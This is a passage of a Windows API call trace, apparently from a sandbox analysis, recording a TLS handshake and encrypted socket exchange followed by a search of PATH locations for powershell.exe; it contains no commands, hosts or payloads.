	[0191.971] InitializeSecurityContextW (in: phCredential=0x5e4e9bc, phContext=0x5e4ead0, pTargetName=0x2ccc138, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ce8cf4, Reserved2=0x0, phNewContext=0x2ce7cf4, pOutput=0x2ce8d08, pfContextAttr=0x2ce61c0, ptsExpiry=0x5e4e9b4 | out: phNewContext=0x2ce7cf4, pOutput=0x2ce8d08, pfContextAttr=0x2ce61c0, ptsExpiry=0x5e4e9b4) returned 0x90312
	[0191.972] GetLastError () returned 0x0
	[0191.972] recv (in: s=0x4e8, buf=0x2ce8d98, len=5, flags=0 | out: buf=0x2ce8d98*) returned 5
	[0191.972] GetLastError () returned 0x0
	[0191.972] recv (in: s=0x4e8, buf=0x2ce8db1, len=4, flags=0 | out: buf=0x2ce8db1*) returned 4
	[0191.973] GetLastError () returned 0x0
	[0191.973] InitializeSecurityContextW (in: phCredential=0x5e4e904, phContext=0x5e4ea18, pTargetName=0x2ccc138, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ce8e2c, Reserved2=0x0, phNewContext=0x2ce7cf4, pOutput=0x2ce8e40, pfContextAttr=0x2ce61c0, ptsExpiry=0x5e4e8fc | out: phNewContext=0x2ce7cf4, pOutput=0x2ce8e40, pfContextAttr=0x2ce61c0, ptsExpiry=0x5e4e8fc) returned 0x90312
	[0192.006] GetLastError () returned 0x0
	[0192.006] FreeContextBuffer (in: pvContextBuffer=0x33fb10 | out: pvContextBuffer=0x33fb10) returned 0x0
	[0192.006] GetLastError () returned 0x0
	[0192.006] send (s=0x4e8, buf=0x2ce8ebc*, len=134, flags=0) returned 134
	[0192.006] GetLastError () returned 0x0
	[0192.006] recv (in: s=0x4e8, buf=0x2ce8ebc, len=5, flags=0 | out: buf=0x2ce8ebc*) returned 5
	[0192.348] GetLastError () returned 0x0
	[0192.349] recv (in: s=0x4e8, buf=0x2ce8ec1, len=1, flags=0 | out: buf=0x2ce8ec1*) returned 1
	[0192.349] GetLastError () returned 0x0
	[0192.350] InitializeSecurityContextW (in: phCredential=0x5e4e84c, phContext=0x5e4e960, pTargetName=0x2ccc138, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ce8fcc, Reserved2=0x0, phNewContext=0x2ce7cf4, pOutput=0x2ce8fe0, pfContextAttr=0x2ce61c0, ptsExpiry=0x5e4e844 | out: phNewContext=0x2ce7cf4, pOutput=0x2ce8fe0, pfContextAttr=0x2ce61c0, ptsExpiry=0x5e4e844) returned 0x90312
	[0192.353] GetLastError () returned 0x0
	[0192.353] recv (in: s=0x4e8, buf=0x2ce9070, len=5, flags=0 | out: buf=0x2ce9070*) returned 5
	[0192.353] GetLastError () returned 0x0
	[0192.354] recv (in: s=0x4e8, buf=0x2ce9089, len=48, flags=0 | out: buf=0x2ce9089*) returned 48
	[0192.354] GetLastError () returned 0x0
	[0192.354] InitializeSecurityContextW (in: phCredential=0x5e4e794, phContext=0x5e4e8a8, pTargetName=0x2ccc138, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ce9130, Reserved2=0x0, phNewContext=0x2ce7cf4, pOutput=0x2ce9144, pfContextAttr=0x2ce61c0, ptsExpiry=0x5e4e78c | out: phNewContext=0x2ce7cf4, pOutput=0x2ce9144, pfContextAttr=0x2ce61c0, ptsExpiry=0x5e4e78c) returned 0x0
	[0192.876] GetLastError () returned 0x0
	[0192.902] QueryContextAttributesW (in: phContext=0x2ce7cf4, ulAttribute=0x4, pBuffer=0x2ce91e8 | out: pBuffer=0x2ce91e8) returned 0x0
	[0192.902] GetLastError () returned 0x0
	[0192.903] QueryContextAttributesW (in: phContext=0x2ce7cf4, ulAttribute=0x5a, pBuffer=0x2ce9238 | out: pBuffer=0x2ce9238) returned 0x0
	[0192.918] GetLastError () returned 0x0
	[0192.938] QueryContextAttributesW (in: phContext=0x2ce7cf4, ulAttribute=0x53, pBuffer=0x2ce9504 | out: pBuffer=0x2ce9504) returned 0x0
	[0192.941] GetLastError () returned 0x80092004
	[0193.007] CertDuplicateCRLContext (pCrlContext=0x3b6398) returned 0x3b6398
	[0193.007] GetLastError () returned 0x80092004
	[0193.011] CertDuplicateStore (hCertStore=0x33d9a8) returned 0x33d9a8
	[0193.011] GetLastError () returned 0x80092004
	[0193.011] CertEnumCertificatesInStore (hCertStore=0x33d9a8, pPrevCertContext=0x0) returned 0x3b63e8
	[0193.011] GetLastError () returned 0x80092004
	[0193.012] CertDuplicateCRLContext (pCrlContext=0x3b63e8) returned 0x3b63e8
	[0193.012] GetLastError () returned 0x80092004
	[0193.015] CertEnumCertificatesInStore (hCertStore=0x33d9a8, pPrevCertContext=0x3b63e8) returned 0x3b6398
	[0193.015] GetLastError () returned 0x80092004
	[0193.015] CertDuplicateCRLContext (pCrlContext=0x3b6398) returned 0x3b6398
	[0193.015] GetLastError () returned 0x80092004
	[0193.015] CertEnumCertificatesInStore (hCertStore=0x33d9a8, pPrevCertContext=0x3b6398) returned 0x0
	[0193.015] GetLastError () returned 0x80092004
	[0193.015] CertCloseStore (hCertStore=0x33d9a8, dwFlags=0x0) returned 1
	[0193.015] GetLastError () returned 0x80092004
	[0193.015] CertFreeCRLContext (pCrlContext=0x3b6398) returned 1
	[0193.015] GetLastError () returned 0x80092004
	[0193.032] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x33da20
	[0193.032] GetLastError () returned 0x80092004
	[0193.035] CertAddCRLLinkToStore (in: hCertStore=0x33da20, pCrlContext=0x3b63e8, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0193.051] GetLastError () returned 0x80092004
	[0193.051] CertAddCRLLinkToStore (in: hCertStore=0x33da20, pCrlContext=0x3b6398, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0193.051] GetLastError () returned 0x80092004
	[0193.054] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x3b6398, pTime=0x5e4e820, hAdditionalStore=0x33da20, pChainPara=0x332a48, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x5e4e760 | out: ppChainContext=0x5e4e760) returned 1
	[0194.141] GetLastError () returned 0x80092004
	[0194.145] CertDuplicateCertificateChain (pChainContext=0x34d6c0) returned 0x34d6c0
	[0194.145] GetLastError () returned 0x80092004
	[0194.147] CertDuplicateCRLContext (pCrlContext=0x3b6398) returned 0x3b6398
	[0194.147] GetLastError () returned 0x80092004
	[0194.147] CertDuplicateCRLContext (pCrlContext=0x61019c0) returned 0x61019c0
	[0194.147] GetLastError () returned 0x80092004
	[0194.147] CertDuplicateCRLContext (pCrlContext=0x6101a10) returned 0x6101a10
	[0194.147] GetLastError () returned 0x80092004
	[0194.148] CertFreeCertificateChain (pChainContext=0x34d6c0) 
	[0194.148] GetLastError () returned 0x80092004
	[0194.150] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x34d6c0, pPolicyPara=0x5e4e908, pPolicyStatus=0x5e4e8f4 | out: pPolicyStatus=0x5e4e8f4) returned 1
	[0194.150] GetLastError () returned 0x0
	[0194.151] SetLastError (dwErrCode=0x0) 
	[0194.151] GetLastError () returned 0x0
	[0194.155] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x34d6c0, pPolicyPara=0x5e4e984, pPolicyStatus=0x5e4e918 | out: pPolicyStatus=0x5e4e918) returned 1
	[0194.155] GetLastError () returned 0x0
	[0194.190] CertFreeCertificateChain (pChainContext=0x34d6c0) 
	[0194.190] GetLastError () returned 0x0
	[0194.190] CertFreeCRLContext (pCrlContext=0x3b6398) returned 1
	[0194.190] GetLastError () returned 0x0
	[0194.200] EncryptMessage (in: phContext=0x2ce7cf4, fQOP=0x0, pMessage=0x2ceb090, MessageSeqNo=0x0 | out: pMessage=0x2ceb090) returned 0x0
	[0194.200] GetLastError () returned 0x0
	[0194.200] send (s=0x4e8, buf=0x2ceaee4*, len=117, flags=0) returned 117
	[0194.201] GetLastError () returned 0x0
	[0194.236] setsockopt (s=0x4e8, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0194.236] GetLastError () returned 0x0
	[0194.237] recv (in: s=0x4e8, buf=0x2ceb1c8, len=5, flags=0 | out: buf=0x2ceb1c8*) returned 5
	[0194.252] GetLastError () returned 0x0
	[0194.252] recv (in: s=0x4e8, buf=0x2ceb1e1, len=2112, flags=0 | out: buf=0x2ceb1e1*) returned 1455
	[0194.252] GetLastError () returned 0x0
	[0194.253] recv (in: s=0x4e8, buf=0x2ceb790, len=657, flags=0 | out: buf=0x2ceb790*) returned 657
	[0194.269] GetLastError () returned 0x0
	[0194.273] DecryptMessage (in: phContext=0x2ce7cf4, pMessage=0x2cebabc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2cebabc, pfQOP=0x0) returned 0x0
	[0194.273] GetLastError () returned 0x0
	[0194.288] setsockopt (s=0x4e8, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0194.288] GetLastError () returned 0x0
	[0194.288] SetEvent (hEvent=0x398) returned 1
	[0194.288] GetLastError () returned 0x0
	[0194.377] VirtualQuery (in: lpAddress=0x5e4e354, lpBuffer=0x5e4f354, dwLength=0x1c | out: lpBuffer=0x5e4f354*(BaseAddress=0x5e4e000, AllocationBase=0x54c0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0194.381] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x332a00, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0194.381] GetLastError () returned 0x0
	[0194.385] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x332a00, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0194.385] GetLastError () returned 0x0
	[0194.385] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x332a00, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0194.385] GetLastError () returned 0x0
	[0194.400] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3a12d0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0194.400] GetLastError () returned 0x0
	[0194.489] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.489] GetLastError () returned 0x0
	[0194.490] SetErrorMode (uMode=0x1) returned 0x1
	[0194.492] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.493] GetLastError () returned 0x3
	[0194.737] SetErrorMode (uMode=0x1) returned 0x1
	[0194.739] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.740] GetLastError () returned 0x3
	[0194.740] SetErrorMode (uMode=0x1) returned 0x1
	[0194.740] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.ps1", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.740] GetLastError () returned 0x3
	[0194.743] SetErrorMode (uMode=0x1) returned 0x1
	[0194.743] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.743] GetLastError () returned 0x3
	[0194.743] SetErrorMode (uMode=0x1) returned 0x1
	[0194.743] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.psm1", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.743] GetLastError () returned 0x3
	[0194.746] SetErrorMode (uMode=0x1) returned 0x1
	[0194.746] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.746] GetLastError () returned 0x3
	[0194.746] SetErrorMode (uMode=0x1) returned 0x1
	[0194.746] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.psd1", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.746] GetLastError () returned 0x3
	[0194.750] SetErrorMode (uMode=0x1) returned 0x1
	[0194.750] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.750] GetLastError () returned 0x3
	[0194.750] SetErrorMode (uMode=0x1) returned 0x1
	[0194.750] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.COM", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.750] GetLastError () returned 0x3
	[0194.753] SetErrorMode (uMode=0x1) returned 0x1
	[0194.753] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.753] GetLastError () returned 0x3
	[0194.753] SetErrorMode (uMode=0x1) returned 0x1
	[0194.754] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.EXE", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.754] GetLastError () returned 0x3
	[0194.756] SetErrorMode (uMode=0x1) returned 0x1
	[0194.756] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.756] GetLastError () returned 0x3
	[0194.756] SetErrorMode (uMode=0x1) returned 0x1
	[0194.756] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.BAT", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.757] GetLastError () returned 0x3
	[0194.759] SetErrorMode (uMode=0x1) returned 0x1
	[0194.760] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.760] GetLastError () returned 0x3
	[0194.760] SetErrorMode (uMode=0x1) returned 0x1
	[0194.760] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.CMD", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.760] GetLastError () returned 0x3
	[0194.762] SetErrorMode (uMode=0x1) returned 0x1
	[0194.763] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.763] GetLastError () returned 0x3
	[0194.763] SetErrorMode (uMode=0x1) returned 0x1
	[0194.763] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.VBS", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.763] GetLastError () returned 0x3
	[0194.766] SetErrorMode (uMode=0x1) returned 0x1
	[0194.766] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.766] GetLastError () returned 0x3
	[0194.766] SetErrorMode (uMode=0x1) returned 0x1
	[0194.766] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.VBE", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.766] GetLastError () returned 0x3
	[0194.926] SetErrorMode (uMode=0x1) returned 0x1
	[0194.926] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.926] GetLastError () returned 0x3
	[0194.926] SetErrorMode (uMode=0x1) returned 0x1
	[0194.927] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.JS", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.927] GetLastError () returned 0x3
	[0194.930] SetErrorMode (uMode=0x1) returned 0x1
	[0194.930] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.930] GetLastError () returned 0x3
	[0194.930] SetErrorMode (uMode=0x1) returned 0x1
	[0194.930] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.JSE", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.930] GetLastError () returned 0x3
	[0194.934] SetErrorMode (uMode=0x1) returned 0x1
	[0194.934] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.934] GetLastError () returned 0x3
	[0194.934] SetErrorMode (uMode=0x1) returned 0x1
	[0194.934] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.WSF", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.935] GetLastError () returned 0x3
	[0194.937] SetErrorMode (uMode=0x1) returned 0x1
	[0194.938] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.938] GetLastError () returned 0x3
	[0194.938] SetErrorMode (uMode=0x1) returned 0x1
	[0194.938] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.WSH", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.939] GetLastError () returned 0x3
	[0194.942] SetErrorMode (uMode=0x1) returned 0x1
	[0194.942] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.942] GetLastError () returned 0x3
	[0194.942] SetErrorMode (uMode=0x1) returned 0x1
	[0194.942] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.MSC", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.942] GetLastError () returned 0x3
	[0194.945] SetErrorMode (uMode=0x1) returned 0x1
	[0194.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.948] GetLastError () returned 0x3
	[0194.948] SetErrorMode (uMode=0x1) returned 0x1
	[0194.948] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.948] GetLastError () returned 0x2
	[0194.949] SetErrorMode (uMode=0x1) returned 0x1
